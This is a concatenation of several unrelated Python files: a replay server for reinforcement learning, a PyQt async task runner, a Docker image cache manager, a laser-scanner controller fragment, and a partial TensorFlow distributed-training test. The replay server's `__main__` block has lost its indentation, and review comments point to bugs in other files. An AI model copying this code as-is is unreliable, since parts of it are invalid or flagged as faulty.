        sys.stderr.write('RESET:\n%s\n' % hokuyo.reset())
        sys.stderr.write('LASER_ON:\n%s\n' % hokuyo.laser_on())
        sys.stderr.write('HIGH_SENSITIVE:\n%s\n' % hokuyo.set_high_sensitive(HIGH_SENSITIVE))
        sys.stderr.write('SPEED_MOTOR:\n%s\n' % hokuyo.set_motor_speed(SPEED_MOTOR))
        sys.stderr.write('SENSOR_SPECS:\n%s\n' % hokuyo.get_sensor_specs())
        sys.stderr.write('SENSOR_STATE:\n%s\n' % hokuyo.get_sensor_state())
        sys.stderr.write('VERSION_INFO:\n%s\n' % hokuyo.get_version_info())
        # Background thread that keeps pulling scans from the device.
        scanning_thread = threading.Thread(target=hokuyo.scanning_loop, name="scanning-thread")
        scanning_thread.start()
        # Serve the Amber message protocol over stdin/stdout.
        controller = HokuyoController(sys.stdin, sys.stdout, hokuyo)
        controller()
    except BaseException as e:
        # Fall back to a no-op controller so the surrounding system keeps working.
        sys.stderr.write('Run without Hokuyo.\n')
        traceback.print_exc()
        controller = NullController(sys.stdin, sys.stdout)
        controller()
replay_server.py | import math
import socket
import time
from multiprocessing import Process, shared_memory, Value, Lock, Queue
import database
import numpy as np
import traceback
import datetime
def request_episode_id(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
                       batch_lock, next_episode_id, episode_queue, args):
    """Hand out a fresh episode id to a client, reserving a progress slot.

    Returns "<episode_id>_<j>" on success, or "-1_-1" when no slot is free,
    the id could not be registered in the database, or any error occurred.
    ``j`` is obtained from the bandit service.
    """
    try:
        from bandit import bandit_client
        j = bandit_client.BanditClient(params).get_j()
        in_db = False
        with next_episode_id.get_lock():
            episode_id = next_episode_id.value
            in_db = cm.init_episode(episode_id, j)
            # only advance the counter if the episode row was actually created
            if in_db:
                next_episode_id.value += 1
        if in_db:
            with progress_lock:
                # count free slots (marked -1) in the shared in-progress table
                check = np.sum(np.where(in_progress == -1, np.ones_like(in_progress), np.zeros_like(in_progress)))
                print(f"\n{check} spaces open for episodes.\n {datetime.datetime.now()}")
                if check > 0:
                    # claim the first free slot for this episode
                    for i in range(len(in_progress)):
                        if in_progress[i] < 0:
                            in_progress[i] = episode_id
                            return f"{episode_id}_{j}"
    except Exception as e:
        print(e)
        print(traceback.print_exc())
    return "-1_-1"
def request_trace_batch(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
                        batch_lock, next_episode_id, episode_queue, args):
    """Reserve a batch of trace ids for training.

    ``args[0]`` is the batch slot index.  Returns "-1" when no episode slot
    is free (throttles training while collection is saturated) or when not
    enough sequences exist yet; otherwise the underscore-joined trace ids
    stored in the chosen batch slot.
    """
    batch_index = int(args[0])
    with progress_lock:
        # number of free (-1) episode slots in the shared table
        check = np.sum(np.where(in_progress == -1, np.ones_like(in_progress), np.zeros_like(in_progress)))
    if check == 0:
        return "-1"
    # asks the DB layer to fill batches[batch_index] under batch_lock
    has_batch = cm.get_trace_batch_ids(params['Misc']['min_required_sequences'], batches, batch_lock, batch_index)
    if not has_batch:
        return "-1"
    else:
        return "_".join(str(v) for v in batches[batch_index])
def request_trace_update(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
                         batch_lock, next_episode_id, episode_queue, args):
    """Re-send the trace ids currently held in batch slot ``args[0]``.

    Returns the underscore-joined ids together with ``True``.
    """
    slot = int(args[0])
    ids = [str(trace_id) for trace_id in batches[slot]]
    return "_".join(ids), True
def request_transition_upload(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
                              batch_lock, next_episode_id, episode_queue, args):
    """Grant the caller permission to upload up to ``args[0]`` transitions.

    Atomically reserves the granted amount out of the shared free-space
    counter and returns the number of transitions the client may upload.
    """
    requested = int(args[0])
    with space_lock:
        granted = min(transition_space_available[0], requested)
        transition_space_available[0] -= granted
    return str(granted)
def priority_calculator(params, config, episode_queue):
    """Worker loop: recompute replay priorities for each finished episode.

    Blocks on ``episode_queue`` and, for every episode id received, asks the
    database layer to (re)calculate that episode's trace priorities.  Runs
    forever; intended as the target of a dedicated Process.
    """
    trace_length = params['Misc']['trace_length']
    replay_period = params['Misc']['replay_period']
    N = params['Misc']['N']
    # when early loop breaking is on, priorities are split per training chunk
    training_splits = params['Misc']['training_splits'] if params['Misc']['break_training_loop_early'] else 1
    cm = database.ConnectionManager(config)
    while True:
        episode_id = episode_queue.get()  # blocks until an episode ends
        cm.calculate_priorities(trace_length, replay_period, N, episode_id, training_splits)
def signal_episode_end(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
                       batch_lock, next_episode_id, episode_queue, args):
    """Mark episode ``args[0]`` as finished.

    Frees every in-progress slot assigned to the episode (resetting it to -1)
    and queues the episode for priority calculation.  Returns "1".
    """
    episode_id = int(args[0])
    print(f"\nEnd of episode {episode_id}\n {datetime.datetime.now()}")
    with progress_lock:
        free_marker = np.full(in_progress.shape, fill_value=-1, dtype='i')
        in_progress[:] = np.where(in_progress == episode_id, free_marker, in_progress)
    episode_queue.put(episode_id)
    return "1"
def signal_trace_update(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
                        batch_lock, next_episode_id, episode_queue, args):
    """Clear batch slot ``args[0]`` after its priority update has been applied.

    Resets every id in that row of the shared batch table to -1 so the slot
    can be refilled.  Returns "1".
    """
    slot = int(args[0])
    with batch_lock:
        batches[slot, :] = -1
    return "1"
def worker(socket, params, config, shared_mem, space_lock, progress_lock, batch_lock, next_episode_id, episode_queue):
    """Request-serving loop for one listening socket.

    Attaches to the shared-memory layout created by server() (episode
    in-progress slots, the batch table, and a trailing int64 free-space
    counter), then forever: accept a connection, read one short
    underscore-delimited command, dispatch it through ``lookup`` and send
    the handler's string reply.  Errors are printed and the loop continues.
    """
    # re-attach by name: this function runs in a child process
    shared_mem = shared_memory.SharedMemory(name=shared_mem)
    L = params['Misc']['L'] * params['Misc']['consecutive_batches'] * 2
    b = params['Misc']['training_batch_size']
    c = params['Misc']['consecutive_training_batches']
    # first L ints: in-progress slots; next b*c ints: batch table; last 8 bytes: counter
    in_progress = np.ndarray(L + (b * c), dtype='i', buffer=shared_mem.buf[:-8])
    in_progress, batches = np.split(in_progress, [L])
    batches = batches.reshape((c, b))
    transition_space_available = np.ndarray(1, dtype=np.int64, buffer=shared_mem.buf[-8:])
    # routing table: category -> subject -> action -> (extra arg count, handler)
    lookup = {
        "request": {
            "episode": {
                "id": (0, request_episode_id)
            },
            "trace": {
                "batch": (1, request_trace_batch),
                "update": (1, request_trace_update)
            },
            "transition": {
                "upload": (1, request_transition_upload)
            }
        },
        "signal": {
            "episode": {
                "end": (1, signal_episode_end)
            },
            "trace": {
                "update": (1, signal_trace_update)
            }
        }
    }
    cm = database.ConnectionManager(config)
    while True:
        try:
            client, address = socket.accept()
            data = client.recv(1024)
            # message format: "<category>_<subject>_<action>[_<arg>...]"
            data = iter(data.decode('utf-8').split("_"))
            additional_arg_count, function = lookup[next(data)][next(data)][next(data)]
            # NOTE(review): request_trace_update returns a (str, bool) tuple,
            # which bytes() below would reject (caught by the except) --
            # confirm the intended wire protocol for that command.
            message = function(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
                               batch_lock, next_episode_id, episode_queue,
                               [next(data) for i in range(additional_arg_count)])
            client.send(bytes(message, 'utf-8'))
            client.close()
        except Exception as e:
            print(e)
            print(traceback.print_exc())
            print(datetime.datetime.now())
def space_allocator(params, config, shared_mem, space_lock, progress_lock, batch_lock):
    """Background loop that keeps the database below its size budget.

    Every 10 seconds: if the database has grown past (limit minus target
    free space) and holds more episodes than the cap, ask the DB layer to
    remove surplus episodes (it receives the shared in-progress/batch tables
    plus their locks), then refresh the shared free-transition counter that
    ``request_transition_upload`` hands out.
    """
    # re-attach to the shared memory created by server() (child process)
    shared_mem = shared_memory.SharedMemory(name=shared_mem)
    L = params['Misc']['L'] * params['Misc']['consecutive_batches'] * 2
    b = params['Misc']['training_batch_size']
    c = params['Misc']['consecutive_training_batches']
    in_progress = np.ndarray(L + (b * c), dtype='i', buffer=shared_mem.buf[:-8])
    in_progress, batches = np.split(in_progress, [L])
    batches = batches.reshape((c, b))
    transition_space_available = np.ndarray(1, dtype=np.int64, buffer=shared_mem.buf[-8:])
    cm = database.ConnectionManager(config)
    target_free_space = params['Misc']['target_free_space'] * (1024 ** 3)  # GiB -> bytes
    byte_limit = params['Misc']['database_size_limit'] * (1024 ** 3)  # GiB -> bytes
    bytes_per_transition = 41840  # assumed storage cost of one transition -- confirm
    num_episodes_allowed = len(in_progress)
    while True:
        db_size = cm.get_database_size()
        if db_size > byte_limit - target_free_space and cm.get_episode_count() > num_episodes_allowed:
            print("\nALLOCATING SPACE")
            print(datetime.datetime.now())
            cm.remove_all_but(num_episodes_allowed, in_progress, progress_lock, batches, batch_lock)
            db_size = cm.get_database_size()
        free_space = byte_limit - db_size
        with space_lock:
            # advertise how many more transitions fit in the remaining budget
            transition_space_available[0] = free_space // bytes_per_transition
        time.sleep(10)
def server(params, config):
    """Start the replay server: shared state, helper processes, workers.

    Creates the shared-memory block holding the episode in-progress slots,
    the batch table and the free-space counter; binds one listening socket
    per configured port; seeds the next episode id from the database; and
    spawns the space allocator, the priority calculator and the socket
    workers.  Never returns.
    """
    import mariadb
    from replay_server import database
    sockets = []
    ip = params['Misc']['replay_ip']
    port_range = params['Misc']['replay_port_range']
    for port in range(min(port_range), max(port_range) + 1):
        serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        serversocket.bind((ip, port))
        serversocket.listen(5)
        sockets.append(serversocket)
    L = params['Misc']['L'] * params['Misc']['consecutive_batches'] * 2
    b = params['Misc']['training_batch_size']
    c = params['Misc']['consecutive_training_batches']
    # (L + b*c) int32 slots plus one trailing int64 free-space counter
    shared_mem = shared_memory.SharedMemory(create=True, size=(L + (b * c)) * 4 + 8)
    init_array = np.ndarray((L + (b * c)), dtype='i', buffer=shared_mem.buf[:-8])
    transition_space_available = np.ndarray(1, dtype=np.int64, buffer=shared_mem.buf[-8:])
    init_array[:] = -1  # -1 marks a free slot everywhere
    progress_lock = Lock()
    batch_lock = Lock()
    space_lock = Lock()
    next_episode_id = Value('i', 0)
    # resume numbering after the highest episode id already in the database
    cm = database.ConnectionManager(config)
    cm.cur.execute("SELECT episode_id FROM episode ORDER BY episode_id DESC")
    for r in cm.cur:
        with next_episode_id.get_lock():
            next_episode_id.value = r[0] + 1
        break
    del cm
    episode_queue = Queue()
    Process(target=space_allocator,
            args=(params, config, shared_mem.name, space_lock, progress_lock, batch_lock)).start()
    Process(target=priority_calculator, args=(params, config, episode_queue)).start()
    workers = [Process(target=worker, args=(
        serversocket, params, config, shared_mem.name, space_lock, progress_lock, batch_lock, next_episode_id,
        episode_queue)) for i in range(params['Misc']['replay_workers']) for serversocket in sockets]
    for p in workers:
        p.daemon = True
        p.start()
    # Keep the main process (and with it the shared memory) alive without
    # the original `while True: pass` busy-wait pinning a full CPU core.
    while True:
        time.sleep(60)
if __name__ == "__main__":
import yaml
with open('../params.yml', 'r') as file:
params = yaml.full_load(file)
server(params, database.DEFAULT_CONFIG)
|
asynchronous.py | import traceback
from enum import Enum
from multiprocessing import Process, Queue, Value
from PyQt5.QtCore import pyqtSignal, QThread
class SignalType(Enum):
    """Kinds of messages a worker process can push to the PyQt thread."""
    # The original declarations had trailing commas, which made every value a
    # one-element tuple (e.g. (2,)); plain ints are what was intended.
    # Members are compared by identity elsewhere, so behavior is unaffected.
    PROGRESS = 2
    COMPLETED = 3
    CANCELLED = 4
    ERRORED = 5
class ProcessSignals:
    """
    An object that the child process uses to send information to the PyQT thread
    """

    def __init__(self):
        self.queue = Queue()
        self._halt = Value('i', 0)

    def _emit(self, signal_type, args):
        # every message is a tuple: (SignalType, *payload)
        self.queue.put((signal_type, *args))

    def progress(self, *args):
        self._emit(SignalType.PROGRESS, args)

    def completed(self, *args):
        self._emit(SignalType.COMPLETED, args)

    def cancelled(self, *args):
        self._emit(SignalType.CANCELLED, args)

    def errored(self, *args):
        self._emit(SignalType.ERRORED, args)

    def halt(self):
        """Return True once the GUI thread has requested cancellation."""
        return self._halt.value == 1

    def setHalt(self):
        """Ask the running job to stop at its next halt() check."""
        self._halt.value = 1
# Can't be part of AsyncTask as this function must be picklable under windows:
# (see https://docs.python.org/2/library/multiprocessing.html#windows)
def wrappedJobFn(jobFn, processSignals, *args):
    """Run *jobFn* in the child process, reporting any exception as ERRORED."""
    try:
        jobFn(processSignals, *args)
    except Exception as exc:
        traceback.print_exc()
        processSignals.errored(exc)
class AsyncTask(QThread):
    """
    Runs a job in a separate process and forwards messages from the job to the
    main thread through a pyqtSignal.
    """
    msg_from_job = pyqtSignal(object)
    running = True  # class-level default; reset per-instance in run()

    def __init__(self, pyqtSignals, jobFn, *args):
        super().__init__()
        self.jobFn = jobFn
        self.args = args
        self.pyqtSignals = pyqtSignals
        self.processSignals = ProcessSignals()

    def run(self):
        # QThread entry point: launch the job process, then pump its queue
        # until a terminal message (completed/cancelled/errored) arrives.
        self.running = True
        p = Process(target=wrappedJobFn, args=(self.jobFn, self.processSignals, *self.args))
        p.start()
        while self.running:
            self._processOutput(self.processSignals.queue.get())  # blocking read

    def _processOutput(self, output):
        # output is a tuple (SignalType, *payload): forward it to the matching
        # Qt signal; terminal types stop the pump loop in run().
        if output[0] is SignalType.PROGRESS:
            self.pyqtSignals.processing_progress.emit(output[1:])
            return
        if output[0] is SignalType.COMPLETED:
            self.pyqtSignals.processing_completed.emit()
            self.running = False
            return
        if output[0] is SignalType.CANCELLED:
            self.pyqtSignals.processing_cancelled.emit()
            self.running = False
            return
        if output[0] is SignalType.ERRORED:
            self.pyqtSignals.processing_errored.emit(output[1:])
            self.running = False
            return

    def halt(self):
        """Request cooperative cancellation of the running job."""
        self.processSignals.setHalt()
|
docker_image_manager.py | from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
from codalab.worker.fsm import DependencyStage
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
# Download state of a Docker image: the digest being pulled, its
# DependencyStage, and a human-readable status message.
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Cache bookkeeping for one local docker image: docker id, digest,
# last-used timestamp, and its virtual/marginal disk sizes.
ImageCacheEntry = namedtuple(
    'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
    """Downloads Docker images on demand and prunes a bounded local cache.

    Downloads happen on background threads tracked in a ThreadDict; a separate
    cleanup thread evicts least-recently-used images once the cache exceeds
    max_image_cache_size. Cache state is persisted via a JsonStateCommitter.
    """

    def __init__(self, commit_file, max_image_cache_size):
        """
        Initializes a DockerImageManager
        :param commit_file: String path to where the state file should be committed
        :param max_image_cache_size: Total size in bytes that the image cache can use
        """
        self._state_committer = JsonStateCommitter(commit_file)  # type: JsonStateCommitter
        self._docker = docker.from_env()  # type: DockerClient
        self._image_cache = {}  # type: Dict[str, ImageCacheEntry]
        # Per-image download bookkeeping; each entry also carries the worker
        # thread plus the 'success'/'status' fields declared here.
        self._downloading = ThreadDict(
            fields={'success': False, 'status': 'Download starting.'}, lock=True
        )
        self._max_image_cache_size = max_image_cache_size
        self._lock = threading.RLock()  # guards _image_cache and state commits
        self._stop = False  # set by stop() to end the cleanup loop
        self._sleep_secs = 10  # pause between cleanup-loop iterations
        self._cleanup_thread = None
        self._load_state()

    def _save_state(self):
        # Persist the image cache under the lock so a concurrent get() cannot
        # mutate it mid-commit.
        with self._lock:
            self._state_committer.commit(self._image_cache)

    def _load_state(self):
        # Restore the image cache committed by a previous run.
        with self._lock:
            self._image_cache = self._state_committer.load()

    def start(self):
        """Start the background cleanup thread (only when a cache cap is set)."""
        logger.info("Starting docker image manager")
        if self._max_image_cache_size:
            def cleanup_loop(self):
                # NOTE(review): _cleanup() itself loops until self._stop, so
                # this outer loop effectively makes a single call that only
                # returns at shutdown, and _save_state()/sleep run once at the
                # end — confirm this is the intended structure.
                while not self._stop:
                    try:
                        self._cleanup()
                        self._save_state()
                    except Exception:
                        traceback.print_exc()
                    time.sleep(self._sleep_secs)
            self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
            self._cleanup_thread.start()

    def stop(self):
        """Signal the cleanup loop and download threads to stop, then join."""
        logger.info("Stopping docker image manager")
        self._stop = True
        logger.debug("Stopping docker image manager: stop the downloads threads")
        self._downloading.stop()
        if self._cleanup_thread:
            logger.debug("Stopping docker image manager: stop the cleanup thread")
            self._cleanup_thread.join()
        logger.info("Stopped docker image manager")

    def _cleanup(self):
        """
        Prunes the image cache for runs.
        1. Only care about images we (this DockerImageManager) downloaded and know about
        2. We use sum of VirtualSize's, which is an upper bound on the disk use of our images:
            in case no images share any intermediate layers, this will be the real disk use,
            however if images share layers, the virtual size will count that layer's size for each
            image that uses it, even though it's stored only once in the disk. The 'Size' field
            accounts for the marginal size each image adds on top of the shared layers, but summing
            those is not accurate either since the shared base layers need to be counted once to get
            the total size. (i.e. summing marginal sizes would give us a lower bound on the total disk
            use of images). Calling df gives us an accurate disk use of ALL the images on the machine
            but because of (1) we don't want to use that.
        """
        # NOTE(review): this outer loop has no sleep of its own; once disk use
        # is under the cap it immediately recomputes — verify the resulting
        # busy-wait until stop() is intentional.
        while not self._stop:
            deletable_entries = set(self._image_cache.values())
            disk_use = sum(cache_entry.virtual_size for cache_entry in deletable_entries)
            while disk_use > self._max_image_cache_size:
                # Evict the least-recently-used candidate first.
                entry_to_remove = min(deletable_entries, key=lambda entry: entry.last_used)
                logger.info(
                    'Disk use (%s) > max cache size (%s), pruning image: %s',
                    disk_use,
                    self._max_image_cache_size,
                    entry_to_remove.digest,
                )
                try:
                    # Removing tags removes the image (once all tags are gone).
                    image_to_delete = self._docker.images.get(entry_to_remove.id)
                    tags_to_delete = image_to_delete.tags
                    for tag in tags_to_delete:
                        self._docker.images.remove(tag)
                    # if we successfully removed the image also remove its cache entry
                    del self._image_cache[entry_to_remove.digest]
                except docker.errors.NotFound:
                    # image doesn't exist anymore for some reason, stop tracking it
                    del self._image_cache[entry_to_remove.digest]
                except docker.errors.APIError as err:
                    # Maybe we can't delete this image because its container is still running
                    # (think a run that takes 4 days so this is the oldest image but still in use)
                    # In that case we just continue with our lives, hoping it will get deleted once
                    # it's no longer in use and the cache becomes full again
                    logger.error(
                        "Cannot remove image %s from cache: %s", entry_to_remove.digest, err
                    )
                # Whether deleted or skipped, drop it from this pass's candidates.
                deletable_entries.remove(entry_to_remove)
                disk_use = sum(entry.virtual_size for entry in deletable_entries)
        logger.debug("Stopping docker image manager cleanup")

    def get(self, image_spec):
        """
        Always request the newest docker image from Dockerhub if it's not in downloading thread and return the current
        downloading status(READY, FAILED, or DOWNLOADING).
        When the requested image in the following states:
        1. If it's not available on the platform, we download the image and return DOWNLOADING status.
        2. If another thread is actively downloading it, we return DOWNLOADING status.
        3. If another thread was downloading it but not active by the time the request was sent, we return the following status:
            * READY if the image was downloaded successfully.
            * FAILED if the image wasn't able to be downloaded due to any reason.
        :param image_spec: Repo image_spec of docker image being requested
        :returns: A DockerAvailabilityState object with the state of the docker image
        """
        if ':' not in image_spec:
            # Both digests and repo:tag kind of specs include the : character. The only case without it is when
            # a repo is specified without a tag (like 'latest')
            # When this is the case, different images API methods act differently:
            # - pull pulls all tags of the image
            # - get tries to get `latest` by default
            # That means if someone requests a docker image without a tag, and the image does not have a latest
            # tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
            # will fail since the `latest` tag won't be found on the system.
            # We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
            # and there's no latest tag on dockerhub.
            # Hence, we append the latest tag to the image spec if there's no tag specified otherwise at the very beginning
            image_spec += ':latest'
        try:
            if image_spec in self._downloading:
                with self._downloading[image_spec]['lock']:
                    if self._downloading[image_spec].is_alive():
                        # Download still in flight: report progress message.
                        return ImageAvailabilityState(
                            digest=None,
                            stage=DependencyStage.DOWNLOADING,
                            message=self._downloading[image_spec]['status'],
                        )
                    else:
                        if self._downloading[image_spec]['success']:
                            # Record the freshly downloaded image in the cache,
                            # keyed by its repo digest (falls back to the spec).
                            image = self._docker.images.get(image_spec)
                            digest = image.attrs.get('RepoDigests', [image_spec])[0]
                            with self._lock:
                                self._image_cache[digest] = ImageCacheEntry(
                                    id=image.id,
                                    digest=digest,
                                    last_used=time.time(),
                                    virtual_size=image.attrs['VirtualSize'],
                                    marginal_size=image.attrs['Size'],
                                )
                            status = ImageAvailabilityState(
                                digest=digest, stage=DependencyStage.READY, message='Image ready'
                            )
                        else:
                            # NOTE(review): failure reads the 'message' key while
                            # the in-flight branch reads 'status' — confirm both
                            # keys are maintained by ThreadDict/download().
                            status = ImageAvailabilityState(
                                digest=None,
                                stage=DependencyStage.FAILED,
                                message=self._downloading[image_spec]['message'],
                            )
                        self._downloading.remove(image_spec)
                        return status
            else:
                def download():
                    # Runs on a background thread owned by self._downloading.
                    logger.debug('Downloading Docker image %s', image_spec)
                    try:
                        self._docker.images.pull(image_spec)
                        logger.debug('Download for Docker image %s complete', image_spec)
                        self._downloading[image_spec]['success'] = True
                        self._downloading[image_spec]['message'] = "Downloading image"
                    except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
                        logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
                        self._downloading[image_spec]['success'] = False
                        self._downloading[image_spec][
                            'message'
                        ] = "Can't download image: {}".format(ex)
                # add_if_new is a no-op if another caller beat us to it.
                self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
                return ImageAvailabilityState(
                    digest=None,
                    stage=DependencyStage.DOWNLOADING,
                    message=self._downloading[image_spec]['status'],
                )
        except Exception as ex:
            # Any unexpected error (docker daemon down, etc.) is surfaced as a
            # FAILED availability state rather than raised to the caller.
            return ImageAvailabilityState(
                digest=None, stage=DependencyStage.FAILED, message=str(ex)
            )
|
sync_replicas_optimizer_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sync_replicas_optimizer.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import create_local_cluster
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import training
# Creates the workers and return their sessions, graphs, train_ops.
# Creates the workers and return their sessions, graphs, train_ops.
def get_workers(num_workers, replicas_to_aggregate, workers):
    """Build one graph + monitored session + train_op per worker.

    Variables are placed on the two PS tasks; each worker gets constant dense
    and sparse gradients whose values depend on worker_id, wrapped in a
    SyncReplicasOptimizer. Worker 0 is chief.
    """
    sessions = []
    graphs = []
    train_ops = []
    for worker_id in range(num_workers):
        graph = ops.Graph()
        is_chief = (worker_id == 0)
        with graph.as_default():
            with ops.device("/job:ps/task:0"):
                global_step = variables.Variable(0, name="global_step", trainable=False)
                var_0 = variables.Variable(0.0, name="v0")
            with ops.device("/job:ps/task:1"):
                var_1 = variables.Variable(1.0, name="v1")
                var_sparse = variables.Variable([[3.0], [4.0]], name="v_sparse")
            with ops.device("/job:worker/task:" + str(worker_id)):
                grads_0 = constant_op.constant(0.1 + worker_id * 0.2)
                grads_1 = constant_op.constant(0.9 + worker_id * 0.2)
                # This is to test against sparse gradients.
                grads_sparse = ops.IndexedSlices(
                    constant_op.constant(
                        [0.1 + worker_id * 0.2], shape=[1, 1]),
                    constant_op.constant([1]),
                    constant_op.constant([2, 1]))
                sgd_opt = gradient_descent.GradientDescentOptimizer(2.0)
                sync_rep_opt = training.SyncReplicasOptimizer(
                    sgd_opt,
                    replicas_to_aggregate=replicas_to_aggregate,
                    total_num_replicas=num_workers)
                train_op = [
                    sync_rep_opt.apply_gradients(
                        zip([grads_0, grads_1, grads_sparse],
                            [var_0, var_1, var_sparse]),
                        global_step=global_step)
                ]
                sync_replicas_hook = sync_rep_opt.make_session_run_hook(
                    is_chief, num_tokens=num_workers)
            # Creates MonitoredSession
            session = training.MonitoredTrainingSession(
                master=workers[worker_id].target,
                is_chief=is_chief,
                hooks=[sync_replicas_hook])
        sessions.append(session)
        graphs.append(graph)
        train_ops.append(train_op)
    return sessions, graphs, train_ops
class SyncReplicasOptimizerTest(test.TestCase):
    """End-to-end tests of SyncReplicasOptimizer on a local in-process cluster."""

    def _run(self, train_op, sess):
        # Helper used as a thread target so workers can step concurrently.
        sess.run(train_op)

    def test2Workers(self):
        """Two workers, both required to aggregate: lock-step behavior."""
        num_workers = 2
        replicas_to_aggregate = 2
        num_ps = 2
        workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
        # Creates and returns all the workers.
        sessions, graphs, train_ops = get_workers(num_workers,
                                                  replicas_to_aggregate, workers)
        # Chief should have already initialized all the variables.
        var_0_g_0 = graphs[0].get_tensor_by_name("v0:0")
        var_1_g_0 = graphs[0].get_tensor_by_name("v1:0")
        local_step_0 = graphs[0].get_tensor_by_name("sync_rep_local_step:0")
        self.assertAllEqual(0.0, sessions[0].run(var_0_g_0))
        self.assertAllEqual(1.0, sessions[0].run(var_1_g_0))
        self.assertAllEqual(0, sessions[0].run(local_step_0))
        # Will just use session 1 to verify all the variables later.
        var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
        var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
        var_sparse_g_1 = graphs[1].get_tensor_by_name("v_sparse:0")
        local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
        global_step = graphs[1].get_tensor_by_name("global_step:0")
        # The steps should also be initialized.
        self.assertAllEqual(0, sessions[1].run(global_step))
        self.assertAllEqual(0, sessions[1].run(local_step_1))
        self.assertAllClose([[3.0], [4.0]], sessions[1].run(var_sparse_g_1))
        # We have initial tokens in the queue so we can call this one by one. After
        # the first step, this will no longer work as there will be no more extra
        # tokens in the queue.
        sessions[0].run(train_ops[0])
        sessions[1].run(train_ops[1])
        # The global step should have been updated and the variables should now have
        # the new values after the average of the gradients are applied.
        while sessions[1].run(global_step) != 1:
            time.sleep(0.01)
        self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
        self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
        self.assertAllClose([[3.0], [4.0 - (0.1 + 0.3) / 2 * 2.0]],
                            sessions[1].run(var_sparse_g_1))
        # The local step for both workers should still be 0 because the initial
        # tokens in the token queue are 0s. This means that the following
        # computation of the gradients will be wasted as local_step is smaller than
        # the current global step. However, this only happens once when the system
        # just starts and this is necessary to make the system robust for the case
        # when chief gets restarted by errors/preemption/...
        self.assertAllEqual(0, sessions[0].run(local_step_0))
        self.assertAllEqual(0, sessions[1].run(local_step_1))
        sessions[0].run(train_ops[0])
        sessions[1].run(train_ops[1])
        # Although the global step should still be 1 as explained above, the local
        # step should now be updated to 1. The variables are still the same.
        self.assertAllEqual(1, sessions[1].run(global_step))
        self.assertAllEqual(1, sessions[0].run(local_step_0))
        self.assertAllEqual(1, sessions[1].run(local_step_1))
        self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
        self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
        # At this step, the token queue is empty. So the 2 workers need to work
        # together to proceed.
        threads = []
        threads.append(
            self.checkedThread(
                target=self._run, args=(train_ops[0], sessions[0])))
        threads.append(
            self.checkedThread(
                target=self._run, args=(train_ops[1], sessions[1])))
        # The two workers starts to execute the train op.
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        # The global step should now be 2 and the gradients should have been
        # applied twice.
        self.assertAllEqual(2, sessions[1].run(global_step))
        self.assertAllClose(0 - 2 * (0.1 + 0.3) / 2 * 2.0,
                            sessions[1].run(var_0_g_1))
        self.assertAllClose(1 - 2 * (0.9 + 1.1) / 2 * 2.0,
                            sessions[1].run(var_1_g_1))

    # 3 workers and one of them is backup.
    def test3Workers1Backup(self):
        """Three workers but only two aggregated: the slowest acts as backup."""
        num_workers = 3
        replicas_to_aggregate = 2
        num_ps = 2
        workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
        # Creates and returns all the workers.
        sessions, graphs, train_ops = get_workers(num_workers,
                                                  replicas_to_aggregate, workers)
        # Chief should have already initialized all the variables.
        var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
        var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
        local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
        global_step = graphs[1].get_tensor_by_name("global_step:0")
        # The steps should also be initilized.
        self.assertAllEqual(0, sessions[1].run(global_step))
        self.assertAllEqual(0, sessions[1].run(local_step_1))
        # We have initial tokens in the queue so we can call this one by one. After
        # the token queue becomes empty, they should be called concurrently.
        # Here worker 0 and worker 2 finished first.
        sessions[0].run(train_ops[0])
        sessions[2].run(train_ops[2])
        # The global step should have been updated since we only need to collect 2
        # gradients. The variables should now have the new values after the average
        # of the gradients from worker 0/2 are applied.
        while sessions[1].run(global_step) != 1:
            time.sleep(0.01)
        self.assertAllEqual(1, sessions[1].run(global_step))
        self.assertAllClose(0 - (0.1 + 0.5) / 2 * 2.0, sessions[1].run(var_0_g_1))
